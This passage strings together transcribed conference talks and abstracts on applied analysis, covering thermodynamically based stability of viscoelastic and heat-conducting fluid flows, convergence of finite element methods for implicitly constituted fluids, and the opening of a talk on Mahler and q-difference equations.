inside. And maybe a new steady pattern will emerge. So the typical examples here are really Bernard convection, Taylor-Couette flow and so on. So the systems with external forcing. And the problem here from the thermodynamically perspective is that you can't guarantee that the net entropy, so it means the entropy of the whole system is increasing because you have fluxes, right? So the system can throw the entropy away or it can transport the energy or entropy out from its surroundings inside to the system. And you have no prior control on the fluxes. So it means that the final point here that you have a conservation of energy and the entropy is rising in this thing, it won't work. But still something can be done. This is a trick that was probably introduced in a rather cryptic form in this paper. So we can try to work with a fine correction of your function that works for the spatially homogeneous steady state. So basically if you know what is the right function for the spatially homogeneous steady state, so for the thermodynamically isolated system, you can have a kind of guess what should be the right function for the thermodynamically open system. What can work as a Lyapunov function? And well in practice, so the formula is here. So again, if you know what is the internal energy in the system, what is the entropy, what are the entropy production processes, then you can take it and substitute it to this formula and you can check whether it works. And I will show you that it really works using, let's say, two case studies, right? So in what follows, I will always assume that I can work with a classical solution. It's a disclaimer, right? It will make things easier, but not too much. So first case studies, the problem of elastic turbulence, so what it is, you have your polymer solution and the polymer solution is placed in a gap between two plates. The top plate is rotating and you have a flow pattern in between the plates. 
What you observe in the experiment is the following. The top plate rotates rather slowly, so the Reynolds number is about 0.7, very small, but you still see a turbulent-looking flow pattern that has all the properties of turbulent flows, at such a small Reynolds number. The reason, and the reason it is called elastic turbulence, is that the fluid between the two plates is not an ordinary fluid but a polymeric solution, so it has an elastic response. This elastic part of the polymer solution induces another nonlinearity in the governing equations, and the transition to turbulence is triggered by this new nonlinearity: not the nonlinearity measured by the Reynolds number, the convective term, but something else, as I will show you. So assume we have the governing equations. The details are not too important, but what is worth remembering is that the Cauchy stress is now the part you are familiar with from Navier-Stokes plus some extra part. This extra part is a tensorial quantity, a three-by-three matrix, and this matrix is governed by its own evolution equation. In that evolution equation the triangle denotes some operator, and the important thing is that you have a nonlinearity here whose strength is, in a sense, measured by the Weissenberg number, the other dimensionless parameter in the system. So we can try to follow the guidelines I have shown you: you know the Helmholtz free energy, you know the entropy production, you know everything, so you can build your functional. Notation: the hat denotes a non-trivial steady state, so a steady, spatially inhomogeneous velocity field and a spatially inhomogeneous distribution of the tensorial quantity B kappa p, and the tilde denotes the perturbation. If you substitute into the formula I have shown you, the candidate Lyapunov functional is this one. Regarding the velocity it is the standard thing, the L2 norm of the velocity perturbation; but regarding the perturbation of the quantity B kappa p, what you get is this expression. It is positive, and it vanishes if and only if B kappa p tilde is equal to zero, but it is not something like the L2 norm of B kappa p tilde; it is something much more complicated. If you use this quantity and do the algebra, you end up with the following formula for the time derivative of the functional. What is shown in red are terms that are negative, and what is shown in black are terms that have no sign a priori. But you see that you are fine: this term is quadratic in the velocity perturbation, this one is quadratic in the quantity B kappa p, and these are just products of B kappa p and D tilde. So if you are lucky, if the negative terms are strong enough, meaning the Reynolds number is small enough and the Weissenberg number is small enough, you can absorb the indefinite terms into the negative ones and you are done. That was the derivative; there is another important ingredient in this business. If you want to use the quantity shown here as a Lyapunov functional, you need a relation between this expression and some kind of distance in the state space.
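For orientation, here is one natural candidate of exactly that "more complicated than L2" type, written under the assumption of an Oldroyd-B-like Helmholtz free energy proportional to tr B minus ln det B. This is a sketch of the shape of the functional, not a quotation of the slide, and mu_1 is an illustrative elastic modulus.

```latex
% Sketch of a candidate Lyapunov functional (Oldroyd-B-type free energy assumed; not the slide verbatim).
\begin{gather*}
\mathcal{V}
  = \frac{1}{2}\int_\Omega \rho\,\lvert\tilde{\boldsymbol{v}}\rvert^{2}\,\mathrm{d}x
  + \frac{\mu_1}{2}\int_\Omega
      \Big[
        \operatorname{tr}\!\big(\widehat{\mathbb{B}}_{\kappa_p}^{-1}\tilde{\mathbb{B}}_{\kappa_p}\big)
        - \ln\det\!\big(\mathbb{I} + \widehat{\mathbb{B}}_{\kappa_p}^{-1}\tilde{\mathbb{B}}_{\kappa_p}\big)
      \Big]\,\mathrm{d}x .
\end{gather*}
```

The second integrand equals the sum of lambda_i minus ln(1 + lambda_i) over the eigenvalues lambda_i of the symmetric matrix B-hat^{-1/2} B-tilde B-hat^{-1/2}, so it is non-negative and vanishes only when the perturbation of B kappa p is zero, exactly the behaviour described above, while clearly not being an L2 norm.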
Another important ingredient is that you have to define the distance in a convenient way. In this setting, what matters is that the quantity B kappa p, the quantity governed by this evolution equation, is a symmetric positive definite matrix, and you need to use this piece of information in your definition of the distance to equilibrium. If you have two symmetric positive definite matrices, there are several ways to define the distance between them, and if you choose the right one (well, we were lucky, this one worked) you are exploiting a structural property that is behind the equations. Using this concept of distance, the quantity really works as a Lyapunov functional. Just the results for Taylor-Couette flow, in this setting: we are able to show that if you are in a safe range of the Reynolds and Weissenberg parameters, if you are here, then any initial perturbation will decay to zero, so you recover the steady solution. So far it is just a sufficient condition. That was one case study. The other one is, let us say, boring from the physical point of view but maybe more interesting from the mathematical point of view: the problem of a vessel with walls kept at non-uniform temperature. We know what to do for isolated vessels: if you have no heat exchange, so a zero Neumann boundary condition, and no mechanical energy exchange, and a fluid inside such a vessel, then the expected long-time behaviour is a zero velocity field and a spatially homogeneous temperature field. That's it. The first open system is very simple: you still have no mechanical energy exchange, so you expect the velocity to decay to zero, but now you have Dirichlet data for the temperature. We are not controlling the fluxes, we are controlling just the temperature, and the temperature on the boundary is spatially homogeneous, just a number; this is called a thermal bath. In this case the expected long-time limit is again zero velocity and a spatially homogeneous temperature, because that is compatible with this boundary condition. A slightly more general setting is the same thing, but now the temperature on the boundary is spatially inhomogeneous, a function of position. Here the expected long-time limit is again zero velocity, but the temperature field will be spatially inhomogeneous: it will be a solution of the steady heat equation. So take the fluid inside to be just the standard Navier-Stokes fluid; these are the governing equations, these are the boundary conditions, and this is the steady state: zero velocity, and the temperature a solution of the steady heat equation with spatially inhomogeneous boundary data. What you expect is that if you perturb this state, then arbitrary perturbations should decay to zero: v tilde and theta tilde should go to zero. And the point is that if you are not able to show that this follows from the governing equations for such a simple system, then probably you cannot do anything sensible with the governing equations. Where is the problem? Regarding the velocity it is easy; it has been known since the fifties or even earlier. You test, formally, with the velocity field, you get this evolution equation for the velocity, and you know that the velocity decays.
Regarding the temperature, the situation is much more difficult, because the thing that helps you kill the kinetic energy appears as a source in the equation for the temperature. The kinetic energy does not disappear; it is converted to thermal energy. So you have a source here, and you do not know when and where the source is triggered; you do not know the fluxes through the boundary; and even if the velocity is small, that does not mean that the velocity gradient is small. All kinds of problems. In principle, you want a method that uses just one piece of information: the amount of dissipated kinetic energy is finite, nothing more. In this simple case you could do something more, but imagine that for complex fluids, for viscoelastic fluids, instead of just 2 mu D : D you have something much more complicated; there is no hope of doing anything with it except using the fact that it has a sign. Now another question is how to measure the size of the temperature perturbation. Again, the L2 norm of the temperature perturbation is not a good idea, because the evolution equation for the temperature perturbation is this one: this term is fine, this term is fine, but you have no control of this one. The temperature perturbation can be both positive and negative, so you do not have a sign and you cannot get a bound on it. Still, you can show something. What I will show you is that you can get this result: this quantity, which is a convex function of theta tilde divided by theta hat, goes to zero, and from this you can conclude that the relative entropy goes to zero in any Lp space; I will show you later how to do this. The critical point is the following lemma. Assume you know that a function has a finite integral from t0 to infinity, and you want to show that the limit of that function y is zero. This is not possible in general; a counterexample is, for instance, something like this, with thinner and thinner peaks. But if you add a condition that does not allow the thin peaks to build up, then the finite integral plus this condition implies the limit behaviour. So you turn the crank and substitute into the functional, and what you get is something like this. This is the functional you should investigate; it follows from thermodynamics. The troublemaker term now disappears, in the sense that it has a sign here: fine, it is negative, maybe we cannot even exploit it, but who cares, because we can work with this one. Now the only problem is to find a match between the right-hand side here and the expression that appears in the formula for the Lyapunov functional: you must have the same quantity on the left-hand and the right-hand side. This is a little bit tricky. Basically, what you exploit is the fact that stability should not depend on the choice of the temperature scale: if you use kelvins you should get the same result, if you use degrees Celsius you should get the same result, and any other temperature scale will also work. This leads you to the following renormalization, if you want, of the evolution equation for the temperature. It is a kind of crazy algebraic manipulation, but it works, and you get a whole family of functionals that you can combine. And if you combine them, you get this quantity.
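The lemma being invoked is, in one standard variant (my phrasing, with a one-sided derivative bound playing the role of the "no thin peaks" condition):

```latex
% One standard variant of the decay lemma (phrasing mine).
\begin{gather*}
\text{Let } y\colon[t_0,\infty)\to[0,\infty) \text{ be absolutely continuous with }
\int_{t_0}^{\infty} y(t)\,\mathrm{d}t < \infty
\ \text{ and } \ \frac{\mathrm{d}y}{\mathrm{d}t} \le C \ \text{ for some } C>0.\\
\text{Then } \lim_{t\to\infty} y(t) = 0.
\end{gather*}
```

Without the second condition the conclusion fails: an integrable train of ever thinner peaks of fixed height is the counterexample mentioned above, and the derivative bound is precisely what forbids such peaks from building up.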
And this is perfect for the lemma I have shown you, so we can conclude that this quantity goes to zero, and this also implies that the relative entropy, the thing with the logarithm here, goes to zero in any Lp space. So, as a conclusion: there is a thermodynamic framework for the stability analysis of open systems, and I hope I have shown you that it works in relatively complex settings, for incompressible viscoelastic rate-type fluids. And that's it.
Analysis of finite amplitude stability of fluid flows is a challenging task even if the fluid of interest is described using the classical mathematical models such as the Navier--Stokes--Fourier model. The issue gets more complicated when one has to deal with complex models for coupled thermomechanical behaviour of non-Newtonian fluids; in particular the viscoelastic rate-type fluids. We show that the knowledge of thermodynamical underpinnings of these complex models can be gainfully exploited in the stability analysis. First we introduce general concepts that allow one to deal with thermodynamically isolated systems, and then we proceed to thermodynamically open systems. Next we document the applications of these concepts in the case of container flows (thermodynamically isolated systems), and in the case of flows in containers with non-uniformly heated walls (mechanically isolated but thermally open system). We end up with mechanically driven systems such as the Taylor--Couette flow.
10.14288/1.0398149 (DOI)
Thank you for the kind invitation. It is really unfortunate that we cannot be in Canada at the moment and have to do this over the internet. As you can see from the title page, this talk, like Josef's talk, is dedicated to Raj, who celebrates his birthday today. My work over the last few years has been very strongly influenced by things that I have learned from Mira and Josef in Prague about Raj's work. As you can see from the title, the talk concerns the analysis and the approximation of implicitly constituted fluid flow models. Let me list a few papers to begin with. Concerning the physical background, I think the key papers are the two at the top, by Raj and by Raj and Srinivasa, from 2006 and 2008, which concern the physical foundations of implicit constitutive theory. There has been subsequent work on the mathematical analysis of the partial differential equations that arise in these models, and these are the papers from which I have learned a lot about the mathematical analysis. If you looked at the mechanical literature and the mathematical analysis literature, you would see quite a substantial body of work. Concerning numerical analysis, I think it is fair to say the literature is really thin. What is listed here is what I am aware of in terms of the analysis of numerical methods, and I do not mean computations: I mean the mathematical analysis of numerical methods for the partial differential equations that arise in these implicitly constituted fluid flow models. There is a range of papers running from steady flows up to time-dependent problems and coupling with the heat equation, and so forth. But since this is a short talk, I decided to concentrate on a simple model, a steady problem, which is the one you see here. You have a bounded Lipschitz domain in R^d, and we are thinking of physical dimensions, so d is 2 or 3. You have the balance of linear momentum, which looks like Navier-Stokes except for one fact: the shear stress tensor will not be linearly related to the symmetric velocity gradient. That would be the case for Navier-Stokes; here there is a nonlinear relationship between them, and, as Josef explained in the previous talk, they are related through an implicit relationship, which is written here. Going back to the equation: u is the velocity, as usual, p is the pressure, you may have a source term on the right-hand side, we are looking at the incompressible case, so the divergence of u is equal to zero, and then some boundary conditions; in the simplest possible case the velocity is equal to zero on the boundary of the domain. S here is assumed, for physical reasons, to be symmetric and trace-free; the "sym" in the subscript corresponds to being symmetric and the zero to being trace-free. This is related to the fact that S and D are in a certain relationship and D has trace zero, because the trace of D(u) is precisely the divergence, and the divergence of u is zero by assumption. It is assumed that G is defined on the Cartesian product of R^{d x d}_{sym,0} with itself and maps into the same set. There will be certain assumptions on this graph, on this implicit constitutive relation: it is assumed that you can identify the implicit constitutive relation with a graph.
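For concreteness, the boundary-value problem just described reads, schematically (my transcription; sign and scaling conventions may differ slightly from the slide):

```latex
% The steady implicitly constituted problem (schematic transcription).
\begin{gather*}
-\operatorname{div}\mathbb{S} + \operatorname{div}(u\otimes u) + \nabla p = f,
\qquad \operatorname{div} u = 0 \quad \text{in } \Omega\subset\mathbb{R}^d,\ d\in\{2,3\},\\
u = 0 \ \text{on } \partial\Omega,
\qquad
\mathbb{G}\big(\mathbb{S},\,\mathbb{D}(u)\big) = 0,
\qquad \mathbb{S},\ \mathbb{D}(u)\in\mathbb{R}^{d\times d}_{\mathrm{sym},0}.
\end{gather*}
```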
So S and D are in a functional relation if and only if the pair of matrices (D, S) lies in the graph, and then certain structural assumptions are made on the graph, which I list here. The first assumption, made for physical reasons, is that the point (0, 0) is in the graph: when D is 0, S is 0. The second assumption is monotonicity of the graph, which is what you see here: if you visualize a coordinate system in which the horizontal axis is the d-axis and the vertical axis is the s-axis, this corresponds to monotonicity in that (d, s) coordinate system. The third assumption, maximal monotonicity, is a technical assumption that simply expresses the fact that there are no gaps in the graph, which is assumed to be monotone. The fourth assumption, which in some form also arose in Josef's talk, is going to be quite important in the analysis: it is a lower bound on the scalar product of the two matrices S and D, which is assumed to be bounded below by a positive constant multiplying the matrix norm of D raised to a certain power r, and similarly for S raised to the Hölder conjugate r'. Incidentally, as Mira was saying at the beginning, I think the arrangement is that you are allowed to interrupt me at any point, correct, Mira? Yes. Okay, so if you have questions please stop me, because otherwise it feels like talking to a blank screen. Here are some examples of these implicit constitutive relations. If you have a linear relationship between the shear rate, the symmetric velocity gradient, and the shear stress, you have a Newtonian fluid; you could have a shear-thickening fluid; you could have a shear-thinning fluid; you could have something like a Bingham fluid, which is this graph here, continuous as a graph but discontinuous as a function, yet a monotone graph; and you could have this upper curve, which corresponds to a pseudoplastic fluid with a yield stress, a Herschel-Bulkley fluid. All of these are covered by the monotone graphs described on the previous slide. Concerning numerical approximation, how do you go about this? The first step in the construction of the numerical method is to regularize the graph, because the graph could potentially exhibit a jump. What is done is to consider a measurable selection from the graph and modify it by convolving with some compactly supported function theta_n in L1; you end up with a modified graph, this red graph. There are other possibilities for smoothing the graph, such as the Yosida regularization, but in any case the first step is some sort of smoothing of the graph. The next step in the construction is to discretize the problem, and to discretize the problem means to replace the infinite-dimensional spaces that appear in the weak formulation of the partial differential equation with suitable finite-dimensional subspaces. In the particular method considered here we are thinking of finite element methods, and finite element methods use piecewise polynomial spaces on triangulations of the domain.
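As a toy illustration of that first, regularization step (not code from the talk), here is a one-dimensional sketch in which a measurable selection of a scalar Bingham-type graph is smoothed by convolution with a compactly supported kernel. The viscosity MU, yield stress TAU_Y and kernel width eps are purely illustrative.

```python
import numpy as np

MU, TAU_Y = 1.0, 0.5  # illustrative viscosity and yield stress


def selection(d):
    """A measurable selection of the scalar Bingham graph (the value 0 is chosen at d = 0)."""
    d = np.asarray(d, dtype=float)
    return 2.0 * MU * d + TAU_Y * np.sign(d)


def mollified_selection(d, eps=1e-2, n_quad=401):
    """Smooth the selection by convolving with a compactly supported bump of width eps."""
    t = np.linspace(-eps, eps, n_quad)
    dt = t[1] - t[0]
    bump = np.exp(-1.0 / np.maximum(1.0 - (t / eps) ** 2, 1e-12))
    bump /= bump.sum() * dt  # normalise the kernel to unit mass
    d = np.atleast_1d(np.asarray(d, dtype=float))
    return np.array([np.sum(selection(di - t) * bump) * dt for di in d])


if __name__ == "__main__":
    print(mollified_selection([-0.1, -1e-3, 0.0, 1e-3, 0.1]))
    # the jump of size 2*TAU_Y at d = 0 is replaced by a smooth, monotone transition
```

The same idea applies to a selection of the tensorial graph; the point is that the smoothed relation is single-valued and continuous while staying close to the original monotone graph.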
So you take your computational domain, whatever it may be, and you triangulate it, obviously not by hand but using an automatic mesh generator, and then you choose finite-dimensional spaces: V_h for the velocity, where h simply stands for the granularity of the discretization grid, the mesh size, and Q_h for the pressure. These are contained in suitable infinite-dimensional spaces: whatever the space for the weak solution was, so W^{1,r}, perhaps with a zero Dirichlet boundary condition, for the velocity, and some Lebesgue space for the pressure, where the zero subscript signifies that the integral average of the pressure is assumed to be zero (not a zero boundary condition, but zero integral mean). Then there are some standard assumptions on these finite-dimensional spaces in order to be able to talk about convergence as you pass to the limit. One thing to point out: when you are working with W^{1,r}, for technical reasons that come up in the analysis the appropriate space for the pressure is L^{r-tilde}, where r-tilde is this funny object defined by these formulas; it is not quite the Hölder conjugate of r but a slight modification depending on how small r is, and for small values of r you need to replace the Hölder conjugate with a different number. Once you have your finite-dimensional spaces, you need to think ahead a little in terms of what you want to do next. One of the big hurdles in the construction of finite element methods for incompressible fluids is that you have to, in some sense, satisfy the divergence constraint div u = 0. If you have reasonably smooth solutions you can satisfy it in a pointwise sense, but if you are working with finite-dimensional approximations of the velocity field it is not clear whether you can ensure that div u is zero pointwise, and you can see from this slide the trouble that is caused when div u is not pointwise zero. Let me run through what would happen if div u were zero pointwise. You look at your weak formulation, you formally take your test function to be the velocity field itself, and you perform integration by parts; this term is what arises from the convective term, this one from the pressure term, and if div u is pointwise zero both of these blue terms cancel. That is very nice: you drop the blue terms. Then, using structural assumption number four, which puts a lower bound on S : D(u), you get a lower bound on this integral in terms of the norms here; on the right-hand side you apply a Cauchy-Schwarz or Hölder inequality, or really just the definition of the negative Sobolev norm, to get a bound on the right-hand side, and you simply kick the D(u) term back into the left-hand side. Then you have a nice energy estimate on the solution in terms of the data. If you are after an analysis of a numerical method for this problem, you have to mimic this process, and the problem is that div u_h need not be pointwise zero. So the question is how to mimic this process if you do not have a pointwise divergence-free velocity field. What you can do for sure, and this is what is done in finite element approximations of incompressible flow, is to at least ensure that the following property holds: the divergence of the approximate velocity field u_h, tested against the functions q_h that come from the approximate pressure space, is equal to zero.
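Written out, the formal a priori estimate that the discrete argument has to mimic is roughly the following (a sketch, assuming div u = 0 pointwise so that the convective and pressure terms have already dropped out, and using the coercivity assumption on the graph):

```latex
% Formal energy estimate (schematic), with div u = 0 pointwise.
\begin{gather*}
c\int_\Omega \Big(\lvert\mathbb{D}(u)\rvert^{r} + \lvert\mathbb{S}\rvert^{r'}\Big)\,\mathrm{d}x
 \;\le\; \int_\Omega \mathbb{S} : \mathbb{D}(u)\,\mathrm{d}x
 \;=\; \langle f,\,u\rangle
 \;\le\; \lVert f\rVert_{W^{-1,r'}(\Omega)}\,\lVert u\rVert_{W^{1,r}_0(\Omega)} .
\end{gather*}
```

A Korn-type inequality and Young's inequality then let one absorb the right-hand side into the left, the "kick back" step mentioned above, yielding a bound on u and S purely in terms of the data.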
This can be done, and there are loads of finite element spaces, a whole zoo of them, that happily achieve this property. There are not so many finite element spaces that can ensure that div u_h is pointwise equal to zero; there are some, for example the Scott-Vogelius or, more recently, the Guzman-Neilan finite element spaces, that do ensure a pointwise divergence-free property. So we distinguish two cases in the analysis: option (a) is that you have this discrete satisfaction of div u_h equal to zero, and option (b) is that you use special finite element functions for which div u_h really is pointwise equal to zero. In case (a), when you work with these approximately divergence-free functions, the problem is that the first blue term from the previous slide is not going to be equal to zero, because setting that term equal to zero really relies on u_h being pointwise divergence-free, and this you do not have. There is a fix for this in the finite element literature on the Navier-Stokes equations: you replace the original object you are dealing with here, div(u tensor v) dotted with w, the term that derives from the convective term in the Navier-Stokes equations, with the trilinear form that you see here. So the original trilinear form is replaced by another trilinear form, and this one always has the property that if the three entries are the same then the expression is equal to zero, which is precisely what you want, and this happens irrespective of whether u_h is pointwise divergence-free or not. This modified trilinear form is also consistent with the original one, in the sense that if div u happens to be equal to zero then it collapses back to the original trilinear form. So there are these two situations one has to think about: approximately divergence-free finite element functions and pointwise divergence-free finite element functions; obviously in the second case this modification is not required. Here is the convergence theorem that can be proved. You have a numerical method in which, instead of the stress tensor, you have its modification through the graph; you have the modification of the trilinear form arising from the convective term; this is the approximation of the pressure term after integration by parts; then you have the source term; and down here in the second line you have the discrete imposition of the divergence constraint. That is the numerical method, and the theorem says the following. In case (a), when you work with approximately divergence-free functions, as long as r, the index that arises in the fourth assumption on the graph, is greater than 2d/(d+1), you have convergence of your numerical approximation to a weak solution of the problem; whereas in case (b), when you really are pointwise divergence-free, you can lower r further, to almost the critical case 2d/(d+2). I think when r equals 2d/(d+2) that is the critical situation in which the convective term is merely in L1, and that is, in a sense, the limit of how far you can go.
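Going back to the modified trilinear form for a moment: one common way to realize it (my notation; the slide may use an equivalent but differently written convention) is the skew-symmetrization

```latex
% A standard skew-symmetrized convective trilinear form (one common choice).
\begin{gather*}
\tilde b(u,v,w)
  := \frac{1}{2}\int_\Omega \big((u\cdot\nabla)v\big)\cdot w\,\mathrm{d}x
   - \frac{1}{2}\int_\Omega \big((u\cdot\nabla)w\big)\cdot v\,\mathrm{d}x ,
\qquad
\tilde b(u,v,v) = 0 ,
\end{gather*}
```

which vanishes whenever the last two arguments coincide, regardless of whether u is divergence-free, and which reduces to the original convective trilinear form, after an integration by parts, whenever div u = 0 and the boundary terms vanish.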
So, in any case, as n tends to infinity (this is the modification of the graph going to the limit) and the mesh size h goes to zero, you have convergence of your sequence of numerical approximations to a weak solution; there is no uniqueness of weak solutions at this stage, and this weak solution satisfies the weak formulation, as you would expect. So, Mira, am I right in thinking that I still have five minutes? Yes, definitely. Okay. In those five minutes let me give you a few ideas of how the proof works, because I love this proof. Some of it is inherited from these papers by Mira, Piotr, Josef and Agnieszka, which concern the proof of existence of weak solutions. They use a Galerkin method, but the Galerkin method used in the proof of existence of weak solutions uses smooth Galerkin basis functions, and obviously here the situation is completely different, because you are working with piecewise polynomial functions: certain tricks that you can do with smooth Galerkin approximations do not work when you are using piecewise polynomial functions. In any case, step one of the proof: you pass to the limit with your modification on a fixed grid. The finite element spaces are fixed, you let the modification parameter tend to infinity, and by using estimates similar to the ones I showed you for the Navier-Stokes equations you have a bound on the sequence of numerical approximations, and by the usual arguments you can pass to the limit. The quantity D(u^n_h) lives in a finite-dimensional space, so boundedness of the sequence automatically implies strong convergence of D(u^n_h) to D(u_h) as n, the graph approximation parameter, goes to the limit. For the second object you have boundedness, but this now comes from an infinite-dimensional space, so all you can say is that it converges weakly to a limit, which is to be identified; then, using the monotonicity of the graph and Minty's method, you can identify this weak limit to be precisely S(D(u_h)), so that the pair D(u_h), S(D(u_h)) in a sense lives on the graph. In the second step you now want to send h to zero. How do you do this? Well, you go back to the previous estimate, and by weak lower semicontinuity you deduce, as you send n to infinity, that you still have an upper bound on the limiting objects, which is this one here. So now you have a bounded sequence D(u_h) in L^r, from which you can extract a weakly convergent subsequence converging to D(u), and once again, because you have a bound on S(D(u_h)) in L^{r'}, it converges weakly to something, and that something you do not know what it is. You would like to say that this S-bar, the thing you have converged to weakly, is S(D(u)), but this is not clear. So what you would like to show is that the pair D(u), S-bar lies on the graph almost everywhere in Omega, or in other words that S-bar, what you have converged to, is S(D(u)). So we come to step three. To show that this pair lies on the graph, you consider this object here; because of monotonicity it is non-negative, and using the various bounds from the previous step, simply by Hölder's inequality, when you integrate the absolute value (in fact the absolute value is not even necessary, because the integrand is non-negative) you get a bound on it by a constant. So you have a bound in L1 on this quantity. Now, unfortunately, L1 is not reflexive, as Josef also mentioned in his talk, but you are still not completely dead with the argument.
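The identification steps via monotonicity, here in step one and again in the final step below, rest on a Minty-type lemma for maximal monotone graphs (here denoted A), which in rough form, with details as in the cited analysis papers, reads:

```latex
% Minty-type identification lemma for a maximal monotone graph (rough statement).
\begin{gather*}
(\mathbb{D}_n,\mathbb{S}_n)\in\mathcal{A}\ \text{a.e.},\quad
\mathbb{D}_n \rightharpoonup \mathbb{D} \ \text{in } L^{r},\quad
\mathbb{S}_n \rightharpoonup \bar{\mathbb{S}} \ \text{in } L^{r'},\quad
\limsup_{n\to\infty}\int_\Omega \mathbb{S}_n : \mathbb{D}_n\,\mathrm{d}x
  \;\le\; \int_\Omega \bar{\mathbb{S}} : \mathbb{D}\,\mathrm{d}x \\
\Longrightarrow\quad (\mathbb{D},\bar{\mathbb{S}})\in\mathcal{A} \ \text{almost everywhere in } \Omega .
\end{gather*}
```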
There is a nice result, the Chacon biting lemma, which, as I mentioned, allows you to consider a nested sequence of domains contained in Omega which exhausts the whole of Omega, such that the discrepancy between Omega and these nested domains shrinks to zero, and you have weak convergence in L1 on the sequence of these nested domains, which is a consequence of this bound via Chacon's biting lemma. One final thing is missing here: because you have weak convergence, you therefore have equi-integrability of the sequence, and if you could manage to show almost-everywhere convergence of this sequence, perhaps to zero, that would provide some helpful information. So this is really the next step. You once again look at the quantity considered in the previous step, and here comes a step that is really specific to the numerical method, where one deviates from the argument in the PDE analysis papers. There, a Lipschitz truncation is used, going back to Acerbi and Fusco, with a refined version of the result in Diening, Malek and Steinhauer. This was not available in the finite element literature, so what we had to do in order to complete the argument was to develop a finite element counterpart of the Lipschitz truncation method, which is contained in this paper with Lars Diening and Christian Kreuzer. I do not want to go through the technicalities of it; the long and short of it is that by using this Lipschitz truncation method it is possible to prove that the object a_h that I considered on the previous slide converges to zero almost everywhere in Omega. So on the one hand you have weak convergence of this a_h, and on the other hand you have almost-everywhere convergence of a_h in Omega; by appealing to Vitali's theorem you can then deduce that a_h converges strongly to zero in L1 on the nested sequence of domains. This is good news, and it is almost the end of the proof, because we already have weak convergence of S(D(u_h)) to S-bar from step two, and we also have weak convergence of D(u_h) to D(u), also from step two; if you combine these two pieces of information with what is written here in line two, you can deduce this equality, and once you have this equality you can appeal to the property of maximal monotonicity of the graph to deduce, from all the things you have, that the pair D(u), S-bar does indeed lie on the graph almost everywhere on the nested sequence of domains. But then, by a diagonal procedure, because these nested domains exhaust the whole domain, you can deduce that the pair D(u), S-bar really is contained in the graph almost everywhere. You have therefore identified the limit of the sequence of stress approximations: D(u), S-bar does lie on the graph, and that is basically the end of the proof.
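For reference, one common formulation of the biting lemma used above (my wording) is:

```latex
% Chacon's biting lemma (one common formulation).
\begin{gather*}
(a_h)\ \text{bounded in } L^1(\Omega)
\ \Longrightarrow\
\exists\ \text{a subsequence},\ a\in L^1(\Omega),\ \text{and sets } E_1\supset E_2\supset\cdots \text{ with } \lvert E_k\rvert\to 0,\\
\text{such that } a_h \rightharpoonup a \ \text{weakly in } L^1(\Omega\setminus E_k) \ \text{for every } k .
\end{gather*}
```

The sets Omega minus E_k are the nested, exhausting domains referred to in the argument, and weak L1 convergence on each of them supplies the equi-integrability that is combined with the almost-everywhere convergence through Vitali's theorem.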
I am almost out of time; I knew I would be out of time. There are lots of numerical simulations that we did; let me just show you one, and that is my last slide. It relates slightly to what Josef was saying earlier on. What I think is fantastic about this implicit constitutive theory is that it allows all sorts of weird and wonderful fluid models. Look at this one: D here is D(u), the symmetric velocity gradient, and you have a model where D is possibly equal to one over two mu times S, so you may have a linear relationship between D and the shear stress on some part of the domain. In this example the region where D equals one over two mu times S is the complement of a circle, so you think of a circle in the domain; in the complement of that circle, basically near the boundary, you have Navier-Stokes, while inside the circle you could have S equal to zero, so you would be down to an incompressible Euler model, as long as the magnitude of D is below a certain threshold; and if D is above that threshold you have a genuinely non-Newtonian model, with an implicit, or nonlinear, relationship between D and S. There are lots of examples in the paper cited at the bottom of the slide, together with some general numerical analysis, with Patrick Farrell, my colleague here in Oxford, and Alexei Gazca, who is in Erlangen at the moment and was our joint student in Oxford. So I think I am out of time. Thank you very much indeed for your attention.
We prove the existence of global weak solutions à la Leray for compressible Navier-Stokes equations with a pressure law which depends on the density and on time and space variables t and x. The assumptions on the pressure contain only locally Lipschitz assumption with respect to the density variable and some hypothesis with respect to the extra time and space variables. It may be seen as a first step to consider heat-conducting Navier-Stokes equations with physical laws such as the truncated virial assumption. The paper focuses on the construction of approximate solutions through a new regularized and fixed point procedure and on the weak stability process taking advantage of the new method introduced by the two first authors with a careful study of an appropriate regularized quantity linked to the pressure.
10.14288/1.0397353 (DOI)
All right, thank you everyone for coming after a wonderful weekend. It is a pleasure to have this talk about difference equations over a field of elliptic functions. Okay. So thank you very much for inviting me to give a talk in this conference. I am a newcomer to the field of difference equations: I was exposed to it about three years ago, when I heard Boris Adamczewski give a wonderful talk about it in Montreal. So thank you, Boris. Just a moment, let me try sharing the slides. Do you see them now? Okay, good; the only problem is that your face somehow blocks the slides for me, but that's okay. Good. So I would like to talk about difference equations over fields of elliptic functions, but to start I will go over two theorems over the rational field, which might be well known, but let us go over them as motivation anyhow. Let capital K be the field obtained from the field of rational functions by extracting roots of the variable x, and view it as a subfield of K hat, which is the field of Puiseux series, obtained in the same way from the field of Laurent power series. Then we have the Mahler operators sigma and tau, raising x to x^p or to x^q, where p and q are natural numbers that are multiplicatively independent: no power of p is a power of q, except for one. A Mahler equation for a power series F in K hat is simply a linear dependence over the field K between the iterates of sigma on F; so for a sigma-Mahler equation you look at F(x), F(x^p), F(x^{p^2}) and so on, and if they satisfy such a linear dependence you say that you have a Mahler equation. Around 1987, Loxton and van der Poorten asked what can be said if a power series F in K hat satisfies simultaneously both a p-Mahler equation and a q-Mahler equation over K, and they conjectured that it must in fact lie in capital K. This was proved about three years ago by Adamczewski and Bell. I should make two remarks. First, it follows easily that if the coefficients are in fact in C(x) and F is a Laurent power series, then F is in C(x) too; the only advantage of working with the larger fields upstairs is that sigma and tau become automorphisms rather than just endomorphisms of the fields. The second remark is that underlying the theorem there is the multiplicative group C*; sigma and tau are endomorphisms of this multiplicative group, and K is really the field of rational functions on its universal covering, in the algebraic sense. There is an even older additive analogue, in which we take K to be simply C(x) and K hat the Laurent series field, and for sigma and tau we take, instead of Mahler operators, p- and q-difference operators: we multiply the variable x by p or q, and again p and q should be multiplicatively independent; they need not be natural numbers, they can be any complex numbers. In 1992, Bezivin and Boutabaa proved that if a formal power series F in K hat satisfies both a p-difference equation and a q-difference equation, then it is a rational function. In the original theorem there were some restrictions, but they can be lifted.
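Written out schematically, the two systems of equations in question are

```latex
% Simultaneous p- and q-Mahler equations for F in \widehat{K} (schematic).
\begin{gather*}
\sum_{i=0}^{m} a_i(x)\,F\!\big(x^{p^{i}}\big) = 0,
\qquad
\sum_{j=0}^{n} b_j(x)\,F\!\big(x^{q^{j}}\big) = 0,
\qquad a_i,\,b_j\in K \ \text{(not all zero)},
\end{gather*}
```

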